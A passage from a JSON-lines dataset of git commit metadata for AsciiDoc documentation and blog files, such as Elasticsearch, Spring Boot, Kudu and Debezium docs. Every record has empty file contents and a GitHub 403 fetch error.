csearch,F0lha\/elasticsearch,sauravmondallive\/elasticsearch,scottsom\/elasticsearch,ImpressTV\/elasticsearch,lightslife\/elasticsearch,cwurm\/elasticsearch,sdauletau\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,mcku\/elasticsearch,vvcephei\/elasticsearch,kcompher\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,tkssharma\/elasticsearch,anti-social\/elasticsearch,lks21c\/elasticsearch,MaineC\/elasticsearch,masaruh\/elasticsearch,SergVro\/elasticsearch,JSCooke\/elasticsearch,schonfeld\/elasticsearch,luiseduardohdbackup\/elasticsearch,Collaborne\/elasticsearch,jchampion\/elasticsearch,pranavraman\/elasticsearch,zhiqinghuang\/elasticsearch,karthikjaps\/elasticsearch,petabytedata\/elasticsearch,adrianbk\/elasticsearch,rmuir\/elasticsearch,lightslife\/elasticsearch,andrejserafim\/elasticsearch,luiseduardohdbackup\/elasticsearch,milodky\/elasticsearch,Collaborne\/elasticsearch,NBSW\/elasticsearch,ESamir\/elasticsearch,drewr\/elasticsearch,zkidkid\/elasticsearch,mute\/elasticsearch,Uiho\/elasticsearch,C-Bish\/elasticsearch,vrkansagara\/elasticsearch,pablocastro\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,gingerwizard\/elasticsearch,ImpressTV\/elasticsearch,overcome\/elasticsearch,girirajsharma\/elasticsearch,mbrukman\/elasticsearch,jw0201\/elastic,diendt\/elasticsearch,PhaedrusTheGreek\/elasticsearch,alexbrasetvik\/elasticsearch,tsohil\/elasticsearch,milodky\/elasticsearch,nazarewk\/elasticsearch,humandb\/elasticsearch,a2lin\/elasticsearch,KimTaehee\/elasticsearch,mkis-\/elasticsearch,iantruslove\/elasticsearch,uschindler\/elasticsearch,ricardocerq\/elasticsearch,amaliujia\/elasticsearch,sneivandt\/elasticsearch,wangtuo\/elasticsearch,YosuaMichael\/elasticsearch,mjason3\/elasticsearch,Brijeshrpatel9\/elasticsearch,slavau\/elasticsearch,humandb\/elasticsearch,jimczi\/elasticsearch,mute\/elasticsearch,Chhunlong\/elasticsearch,springning\/elasticsearch,naveenhooda2000\/elasticsearch,YosuaMichael\/elasticsearch,linglaiyao1314\/elasticsearch,tahaemin\/elasticsearch,camilojd\/elasticsearch,acchen97\/elasticsearch,lchennup\/elasticsearch,dataduke\/elasticsearch,JervyShi\/elasticsearch,nknize\/elasticsearch,humandb\/elasticsearch,karthikjaps\/elasticsearch,kenshin233\/elasticsearch,iamjakob\/elasticsearch,mapr\/elasticsearch,girirajsharma\/elasticsearch,vrkansagara\/elasticsearch,truemped\/elasticsearch,clintongormley\/elasticsearch,nellicus\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,xpandan\/elasticsearch,petabytedata\/elasticsearch,coding0011\/elasticsearch,Flipkart\/elasticsearch,easonC\/elasticsearch,Stacey-Gammon\/elasticsearch,Siddartha07\/elasticsearch,liweinan0423\/elasticsearch,lks21c\/elasticsearch,areek\/elasticsearch,mmaracic\/elasticsearch,heng4fun\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,EasonYi\/elasticsearch,brandonkearby\/elasticsearch,qwerty4030\/elasticsearch,Fsero\/elasticsearch,avikurapati\/elasticsearch,mrorii\/elasticsearch,golubev\/elasticsearch,hanst\/elasticsearch,fekaputra\/elasticsearch,yynil\/elasticsearch,KimTaehee\/elasticsearch,clintongormley\/elasticsearch,kenshin233\/elasticsearch,smflorentino\/elasticsearch,martinstuga\/elasticsearch,mortonsykes\/elasticsearch,yynil\/elasticsearch,amit-shar\/elasticsearch,sarwarbhuiyan\/elasticsearch,vroyer\/elasticassandra,amaliujia\/elasticsearch,mjason3\/elasticsearch,HarishAtGitHub\/elasticsearch,Helen-Zhao\/elasticsearch,i-am-Nathan\/elasticsearch,kcompher\/elasticsearch,wbowling\/elasticsearch,jeteve\/elasticsearch,markwalkom\/elasticsearch,heng4fun\/elasticsearch,mgalushka\/elasticsearch,pritishppai\/el
asticsearch,trangvh\/elasticsearch,nellicus\/elasticsearch,wangtuo\/elasticsearch,linglaiyao1314\/elasticsearch,YosuaMichael\/elasticsearch,alexkuk\/elasticsearch,lightslife\/elasticsearch,pranavraman\/elasticsearch,huypx1292\/elasticsearch,golubev\/elasticsearch,F0lha\/elasticsearch,Shekharrajak\/elasticsearch,YosuaMichael\/elasticsearch,elancom\/elasticsearch,dongjoon-hyun\/elasticsearch,xpandan\/elasticsearch,infusionsoft\/elasticsearch,djschny\/elasticsearch,LewayneNaidoo\/elasticsearch,Rygbee\/elasticsearch,ouyangkongtong\/elasticsearch,jeteve\/elasticsearch,tahaemin\/elasticsearch,mnylen\/elasticsearch,markharwood\/elasticsearch,lydonchandra\/elasticsearch,brandonkearby\/elasticsearch,strapdata\/elassandra-test,mkis-\/elasticsearch,ckclark\/elasticsearch,StefanGor\/elasticsearch,franklanganke\/elasticsearch,achow\/elasticsearch,kcompher\/elasticsearch,kalburgimanjunath\/elasticsearch,mapr\/elasticsearch,mgalushka\/elasticsearch,cnfire\/elasticsearch-1,Chhunlong\/elasticsearch,sposam\/elasticsearch,khiraiwa\/elasticsearch,dongjoon-hyun\/elasticsearch,sdauletau\/elasticsearch,nellicus\/elasticsearch,gingerwizard\/elasticsearch,mbrukman\/elasticsearch,phani546\/elasticsearch,JSCooke\/elasticsearch,tkssharma\/elasticsearch,fforbeck\/elasticsearch,jprante\/elasticsearch,AndreKR\/elasticsearch,lks21c\/elasticsearch,tsohil\/elasticsearch,Microsoft\/elasticsearch,socialrank\/elasticsearch,episerver\/elasticsearch,humandb\/elasticsearch,martinstuga\/elasticsearch,strapdata\/elassandra-test,18098924759\/elasticsearch,yanjunh\/elasticsearch,robin13\/elasticsearch,episerver\/elasticsearch,sjohnr\/elasticsearch,HonzaKral\/elasticsearch,naveenhooda2000\/elasticsearch,tahaemin\/elasticsearch,khiraiwa\/elasticsearch,strapdata\/elassandra5-rc,golubev\/elasticsearch,avikurapati\/elasticsearch,MaineC\/elasticsearch,sposam\/elasticsearch,rajanm\/elasticsearch,sauravmondallive\/elasticsearch,kubum\/elasticsearch,scorpionvicky\/elasticsearch,awislowski\/elasticsearch,jbertouch\/elasticsearch,mm0\/elasticsearch,knight1128\/elasticsearch,Widen\/elasticsearch,elasticdog\/elasticsearch,robin13\/elasticsearch,hafkensite\/elasticsearch,markharwood\/elasticsearch,dylan8902\/elasticsearch,martinstuga\/elasticsearch,hydro2k\/elasticsearch,Widen\/elasticsearch,umeshdangat\/elasticsearch,markharwood\/elasticsearch,kingaj\/elasticsearch,s1monw\/elasticsearch,dylan8902\/elasticsearch,karthikjaps\/elasticsearch,Liziyao\/elasticsearch,Helen-Zhao\/elasticsearch,rhoml\/elasticsearch,jimhooker2002\/elasticsearch,sdauletau\/elasticsearch,beiske\/elasticsearch,wenpos\/elasticsearch,geidies\/elasticsearch,djschny\/elasticsearch,artnowo\/elasticsearch,mikemccand\/elasticsearch,wenpos\/elasticsearch,cnfire\/elasticsearch-1,jango2015\/elasticsearch,milodky\/elasticsearch,sc0ttkclark\/elasticsearch,adrianbk\/elasticsearch,StefanGor\/elasticsearch,linglaiyao1314\/elasticsearch,diendt\/elasticsearch,yanjunh\/elasticsearch,hirdesh2008\/elasticsearch,mnylen\/elasticsearch,maddin2016\/elasticsearch,EasonYi\/elasticsearch,sreeramjayan\/elasticsearch,fernandozhu\/elasticsearch,mikemccand\/elasticsearch,pozhidaevak\/elasticsearch,jeteve\/elasticsearch,apepper\/elasticsearch,kingaj\/elasticsearch,Rygbee\/elasticsearch,mkis-\/elasticsearch,khiraiwa\/elasticsearch,naveenhooda2000\/elasticsearch,jprante\/elasticsearch,hirdesh2008\/elasticsearch,i-am-Nathan\/elasticsearch,alexkuk\/elasticsearch,Brijeshrpatel9\/elasticsearch,18098924759\/elasticsearch,rajanm\/elasticsearch,pablocastro\/elasticsearch,codebunt\/elasticsearch,tebriel\/elasticsearc
h,nknize\/elasticsearch,jbertouch\/elasticsearch,Shepard1212\/elasticsearch,smflorentino\/elasticsearch,bawse\/elasticsearch,vvcephei\/elasticsearch,mapr\/elasticsearch,nezirus\/elasticsearch,btiernay\/elasticsearch,hirdesh2008\/elasticsearch,skearns64\/elasticsearch,wittyameta\/elasticsearch,kalburgimanjunath\/elasticsearch,ivansun1010\/elasticsearch,infusionsoft\/elasticsearch,amit-shar\/elasticsearch,mcku\/elasticsearch,areek\/elasticsearch,adrianbk\/elasticsearch,tkssharma\/elasticsearch,elancom\/elasticsearch,areek\/elasticsearch,Ansh90\/elasticsearch,NBSW\/elasticsearch,tkssharma\/elasticsearch,nomoa\/elasticsearch,vingupta3\/elasticsearch,Fsero\/elasticsearch,fforbeck\/elasticsearch,iacdingping\/elasticsearch,kkirsche\/elasticsearch,nellicus\/elasticsearch,andrestc\/elasticsearch,truemped\/elasticsearch,mjhennig\/elasticsearch,EasonYi\/elasticsearch,jprante\/elasticsearch,chirilo\/elasticsearch,girirajsharma\/elasticsearch,pranavraman\/elasticsearch,codebunt\/elasticsearch,kalburgimanjunath\/elasticsearch,JackyMai\/elasticsearch,geidies\/elasticsearch,mrorii\/elasticsearch,sarwarbhuiyan\/elasticsearch,scorpionvicky\/elasticsearch,JervyShi\/elasticsearch,vietlq\/elasticsearch,mbrukman\/elasticsearch,infusionsoft\/elasticsearch,knight1128\/elasticsearch,liweinan0423\/elasticsearch,infusionsoft\/elasticsearch,knight1128\/elasticsearch,njlawton\/elasticsearch,strapdata\/elassandra,obourgain\/elasticsearch,mohit\/elasticsearch,sauravmondallive\/elasticsearch,kimimj\/elasticsearch,Fsero\/elasticsearch,acchen97\/elasticsearch,chrismwendt\/elasticsearch,mgalushka\/elasticsearch,skearns64\/elasticsearch,snikch\/elasticsearch,MisterAndersen\/elasticsearch,sneivandt\/elasticsearch,zhiqinghuang\/elasticsearch,andrestc\/elasticsearch,szroland\/elasticsearch,yuy168\/elasticsearch,loconsolutions\/elasticsearch,ouyangkongtong\/elasticsearch,ouyangkongtong\/elasticsearch,onegambler\/elasticsearch,zkidkid\/elasticsearch,mm0\/elasticsearch,LeoYao\/elasticsearch,MetSystem\/elasticsearch,hanswang\/elasticsearch,strapdata\/elassandra,feiqitian\/elasticsearch,masterweb121\/elasticsearch,schonfeld\/elasticsearch,thecocce\/elasticsearch,jbertouch\/elasticsearch,geidies\/elasticsearch,strapdata\/elassandra,JackyMai\/elasticsearch,jw0201\/elastic,heng4fun\/elasticsearch,MisterAndersen\/elasticsearch,vingupta3\/elasticsearch,scorpionvicky\/elasticsearch,nilabhsagar\/elasticsearch,diendt\/elasticsearch,szroland\/elasticsearch,jpountz\/elasticsearch,btiernay\/elasticsearch,mgalushka\/elasticsearch,bawse\/elasticsearch,mcku\/elasticsearch,trangvh\/elasticsearch,huanzhong\/elasticsearch,mbrukman\/elasticsearch,ouyangkongtong\/elasticsearch,strapdata\/elassandra5-rc,geidies\/elasticsearch,rajanm\/elasticsearch,hirdesh2008\/elasticsearch,Asimov4\/elasticsearch,markllama\/elasticsearch,polyfractal\/elasticsearch,jeteve\/elasticsearch,kimimj\/elasticsearch,chrismwendt\/elasticsearch,markwalkom\/elasticsearch,petabytedata\/elasticsearch,sc0ttkclark\/elasticsearch,dylan8902\/elasticsearch,vvcephei\/elasticsearch,clintongormley\/elasticsearch,achow\/elasticsearch,yanjunh\/elasticsearch,kalimatas\/elasticsearch,wayeast\/elasticsearch,AshishThakur\/elasticsearch,huypx1292\/elasticsearch,iacdingping\/elasticsearch,iamjakob\/elasticsearch,wimvds\/elasticsearch,btiernay\/elasticsearch,jpountz\/elasticsearch,pablocastro\/elasticsearch,YosuaMichael\/elasticsearch,pritishppai\/elasticsearch,fekaputra\/elasticsearch,knight1128\/elasticsearch,HarishAtGitHub\/elasticsearch,ThalaivaStars\/OrgRepo1,nomoa\/elasticsearch,mikemccand\/ela
sticsearch,aglne\/elasticsearch,naveenhooda2000\/elasticsearch,mortonsykes\/elasticsearch,Chhunlong\/elasticsearch,sc0ttkclark\/elasticsearch,petabytedata\/elasticsearch,kcompher\/elasticsearch,Siddartha07\/elasticsearch,JSCooke\/elasticsearch,KimTaehee\/elasticsearch,alexbrasetvik\/elasticsearch,ZTE-PaaS\/elasticsearch,hydro2k\/elasticsearch,yongminxia\/elasticsearch,MjAbuz\/elasticsearch,elasticdog\/elasticsearch,jchampion\/elasticsearch,uschindler\/elasticsearch,jango2015\/elasticsearch,lmtwga\/elasticsearch,jbertouch\/elasticsearch,lightslife\/elasticsearch,martinstuga\/elasticsearch,zhiqinghuang\/elasticsearch,ulkas\/elasticsearch,huanzhong\/elasticsearch,xpandan\/elasticsearch,aglne\/elasticsearch,HonzaKral\/elasticsearch,chirilo\/elasticsearch","old_file":"docs\/reference\/analysis\/tokenfilters\/standard-tokenfilter.asciidoc","new_file":"docs\/reference\/analysis\/tokenfilters\/standard-tokenfilter.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6d6cdc7521d014d6ed1c3702e1852e046801ede4","subject":"Update 2017-04-02-Confidence-CTF-Public-Key-Infrastructure-400.adoc","message":"Update 2017-04-02-Confidence-CTF-Public-Key-Infrastructure-400.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-04-02-Confidence-CTF-Public-Key-Infrastructure-400.adoc","new_file":"_posts\/2017-04-02-Confidence-CTF-Public-Key-Infrastructure-400.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6640f5f8babb6afc747c5d0d8be2b78abe69294a","subject":"Adding Debezium 1.2.0.Final release announcement","message":"Adding Debezium 1.2.0.Final release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2020-06-24-debezium-1-2-final-released.adoc","new_file":"blog\/2020-06-24-debezium-1-2-final-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0c86e8e5554d00d263f0ac6f695094bf5ceefe62","subject":"Add guide for a chrooted ergodox ez build","message":"Add guide for a chrooted ergodox ez build\n","repos":"SevereOverfl0w\/.files,SevereOverfl0w\/.files,SevereOverfl0w\/.files","old_file":"docs\/void-chroot-ergodox-ez.adoc","new_file":"docs\/void-chroot-ergodox-ez.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SevereOverfl0w\/.files.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ebd9c770eebf5bd7a3338bf7334a9d8de81a129","subject":"JSON-RPC methods have not descriptions","message":"JSON-RPC methods have not descriptions\n\nAdd details for `emerald_listAccounts`, `emerald_updateAccount` and\nothers.\n","repos":"dulanov\/emerald-rs","old_file":"docs\/api.adoc","new_file":"docs\/api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL 
returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dc97c8b41877f8be62e8a555e408505dbe969b83","subject":"Update 2018-03-10-Azure-10.adoc","message":"Update 2018-03-10-Azure-10.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-10-Azure-10.adoc","new_file":"_posts\/2018-03-10-Azure-10.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ad3436c065c181e337cdc68ee5f29df7f16536a0","subject":"Update 2018-03-10-Azure-10.adoc","message":"Update 2018-03-10-Azure-10.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-10-Azure-10.adoc","new_file":"_posts\/2018-03-10-Azure-10.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d716be164646f1c33e48494d9efdf1997e4327af","subject":"Update 2018-09-04-vr-comic.adoc","message":"Update 2018-09-04-vr-comic.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-04-vr-comic.adoc","new_file":"_posts\/2018-09-04-vr-comic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d349672d98b301994e171dfeefccc67fce888ccd","subject":"Update 2018-05-28-Gas.adoc","message":"Update 2018-05-28-Gas.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-28-Gas.adoc","new_file":"_posts\/2018-05-28-Gas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e002f1210469345106c3be4cd393cf7881ecd985","subject":"Update 2015-09-10-.adoc","message":"Update 2015-09-10-.adoc","repos":"stay-india\/stay-india.github.io,stay-india\/stay-india.github.io,stay-india\/stay-india.github.io","old_file":"_posts\/2015-09-10-.adoc","new_file":"_posts\/2015-09-10-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stay-india\/stay-india.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da0ae7a0d65234723289a9d0d25cebbee021b308","subject":"Update 2019-01-13-.adoc","message":"Update 2019-01-13-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-01-13-.adoc","new_file":"_posts\/2019-01-13-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable 
to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a17985ce740e09f22f247d6e2d0d38396d9c85f1","subject":"y2b create post 3 QUESTIONS","message":"y2b create post 3 QUESTIONS","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-08-15-3-QUESTIONS.adoc","new_file":"_posts\/2013-08-15-3-QUESTIONS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7618e89534de5f8ead26a98132ad3eaba2150b35","subject":"Update 2018-05-19-Go-O-R-Join.adoc","message":"Update 2018-05-19-Go-O-R-Join.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-19-Go-O-R-Join.adoc","new_file":"_posts\/2018-05-19-Go-O-R-Join.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e5ed5ebf8ba8eb87443ca6acf9b54d755869ed74","subject":"Fix \"Query Parameters\" section name","message":"Fix \"Query Parameters\" section name\n\nCloses gh-14600\n","repos":"Buzzardo\/spring-boot,yangdd1205\/spring-boot,mbenson\/spring-boot,scottfrederick\/spring-boot,donhuvy\/spring-boot,donhuvy\/spring-boot,donhuvy\/spring-boot,joshiste\/spring-boot,philwebb\/spring-boot,mdeinum\/spring-boot,jxblum\/spring-boot,vpavic\/spring-boot,shakuzen\/spring-boot,michael-simons\/spring-boot,philwebb\/spring-boot,kdvolder\/spring-boot,mbenson\/spring-boot,mdeinum\/spring-boot,tiarebalbi\/spring-boot,kdvolder\/spring-boot,eddumelendez\/spring-boot,philwebb\/spring-boot,donhuvy\/spring-boot,hello2009chen\/spring-boot,dreis2211\/spring-boot,scottfrederick\/spring-boot,mdeinum\/spring-boot,chrylis\/spring-boot,shakuzen\/spring-boot,aahlenst\/spring-boot,philwebb\/spring-boot,Buzzardo\/spring-boot,eddumelendez\/spring-boot,michael-simons\/spring-boot,shakuzen\/spring-boot,aahlenst\/spring-boot,ilayaperumalg\/spring-boot,mbenson\/spring-boot,NetoDevel\/spring-boot,aahlenst\/spring-boot,wilkinsona\/spring-boot,aahlenst\/spring-boot,wilkinsona\/spring-boot,ilayaperumalg\/spring-boot,wilkinsona\/spring-boot,royclarkson\/spring-boot,wilkinsona\/spring-boot,spring-projects\/spring-boot,michael-simons\/spring-boot,vpavic\/spring-boot,ilayaperumalg\/spring-boot,rweisleder\/spring-boot,vpavic\/spring-boot,wilkinsona\/spring-boot,rweisleder\/spring-boot,hello2009chen\/spring-boot,dreis2211\/spring-boot,NetoDevel\/spring-boot,hello2009chen\/spring-boot,lburgazzoli\/spring-boot,shakuzen\/spring-boot,htynkn\/spring-boot,tiarebalbi\/spring-boot,vpavic\/spring-boot,yangdd1205\/spring-boot,NetoDevel\/spring-boot,mdeinum\/spring-boot,eddumelendez\/spring-boot,lburgazzoli\/spring-boot,donhuvy\/spring-boot,eddumelendez\/spring-boot,mdeinum\/spring-boot,rweisleder\/spring-boot,donhuvy\/spring-boot,jxblum\/spring-boot,chrylis\/spring-boot,chrylis\/spring-boot,aahlenst\/spring-boot,ptahchiev\/spring-boot,dreis2211\/spring-boot,jxblum\/spring-boot,dreis2211\/spring-boot,Buzzardo\/spring-boot,Buzzardo\/spring-boot,rweisleder\/spring-boot,mbenson\/
spring-boot,vpavic\/spring-boot,drumonii\/spring-boot,drumonii\/spring-boot,htynkn\/spring-boot,hello2009chen\/spring-boot,NetoDevel\/spring-boot,joshiste\/spring-boot,ptahchiev\/spring-boot,htynkn\/spring-boot,htynkn\/spring-boot,tiarebalbi\/spring-boot,michael-simons\/spring-boot,spring-projects\/spring-boot,Buzzardo\/spring-boot,NetoDevel\/spring-boot,scottfrederick\/spring-boot,rweisleder\/spring-boot,vpavic\/spring-boot,royclarkson\/spring-boot,ptahchiev\/spring-boot,ptahchiev\/spring-boot,ptahchiev\/spring-boot,kdvolder\/spring-boot,mdeinum\/spring-boot,wilkinsona\/spring-boot,mbenson\/spring-boot,scottfrederick\/spring-boot,jxblum\/spring-boot,dreis2211\/spring-boot,kdvolder\/spring-boot,joshiste\/spring-boot,scottfrederick\/spring-boot,tiarebalbi\/spring-boot,kdvolder\/spring-boot,michael-simons\/spring-boot,ilayaperumalg\/spring-boot,hello2009chen\/spring-boot,joshiste\/spring-boot,drumonii\/spring-boot,tiarebalbi\/spring-boot,eddumelendez\/spring-boot,chrylis\/spring-boot,eddumelendez\/spring-boot,htynkn\/spring-boot,spring-projects\/spring-boot,michael-simons\/spring-boot,yangdd1205\/spring-boot,shakuzen\/spring-boot,royclarkson\/spring-boot,joshiste\/spring-boot,mbenson\/spring-boot,ilayaperumalg\/spring-boot,drumonii\/spring-boot,drumonii\/spring-boot,jxblum\/spring-boot,royclarkson\/spring-boot,ilayaperumalg\/spring-boot,aahlenst\/spring-boot,royclarkson\/spring-boot,lburgazzoli\/spring-boot,philwebb\/spring-boot,tiarebalbi\/spring-boot,ptahchiev\/spring-boot,spring-projects\/spring-boot,Buzzardo\/spring-boot,philwebb\/spring-boot,rweisleder\/spring-boot,htynkn\/spring-boot,jxblum\/spring-boot,chrylis\/spring-boot,drumonii\/spring-boot,spring-projects\/spring-boot,kdvolder\/spring-boot,spring-projects\/spring-boot,dreis2211\/spring-boot,joshiste\/spring-boot,lburgazzoli\/spring-boot,scottfrederick\/spring-boot,shakuzen\/spring-boot,lburgazzoli\/spring-boot,chrylis\/spring-boot","old_file":"spring-boot-project\/spring-boot-actuator-autoconfigure\/src\/main\/asciidoc\/endpoints\/caches.adoc","new_file":"spring-boot-project\/spring-boot-actuator-autoconfigure\/src\/main\/asciidoc\/endpoints\/caches.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lburgazzoli\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"816bc6fd8a8e9a75c4cbd40de9e0d37fac6f7b74","subject":"[docs] add info on rebalancer's --report-only flag","message":"[docs] add info on rebalancer's --report-only flag\n\nDocumented the --report-only command-line flag for the rebalancer\nkudu CLI tool. 
Documented the --output_replica_distribution_details\nflag as well.\n\nThis is a follow-up to f6668ecac27492cbe6ba7682beff6d347650d689.\n\nChange-Id: I80265eba61c347f70680636f32e0b80ee90ee59f\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/11479\nTested-by: Kudu Jenkins\nReviewed-by: Will Berkeley <c74686ab413a71926fc1bc9d16ebfa30e619336a@gmail.com>\n","repos":"InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu","old_file":"docs\/administration.adoc","new_file":"docs\/administration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6461932ebb68c691fb2d874113392103c142e58b","subject":"Update 2018-08-25-remind-me.adoc","message":"Update 2018-08-25-remind-me.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-08-25-remind-me.adoc","new_file":"_posts\/2018-08-25-remind-me.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7221c981933cad3f14ac3c3640d100e28a989a80","subject":"Update 2016-09-02-Swift-Tuple.adoc","message":"Update 2016-09-02-Swift-Tuple.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"453a1f939e5869780dc68bd27a1d55caa18e6688","subject":"Update 2018-10-12-Laravel-D-B.adoc","message":"Update 2018-10-12-Laravel-D-B.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-12-Laravel-D-B.adoc","new_file":"_posts\/2018-10-12-Laravel-D-B.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d2ceef5e103a4d0e6534e8239293afbf1155e623","subject":"Deleted _posts\/2015-01-31-H24.adoc","message":"Deleted _posts\/2015-01-31-H24.adoc","repos":"simonturesson\/hubpresstestsimon,simonturesson\/hubpresstestsimon,simonturesson\/hubpresstestsimon,simonturesson\/hubpresstestsimon","old_file":"_posts\/2015-01-31-H24.adoc","new_file":"_posts\/2015-01-31-H24.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simonturesson\/hubpresstestsimon.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8c0dde3f0312a53de5837fd6daf2f236c8827a4c","subject":"Update 2018-05-28-Gas.adoc","message":"Update 
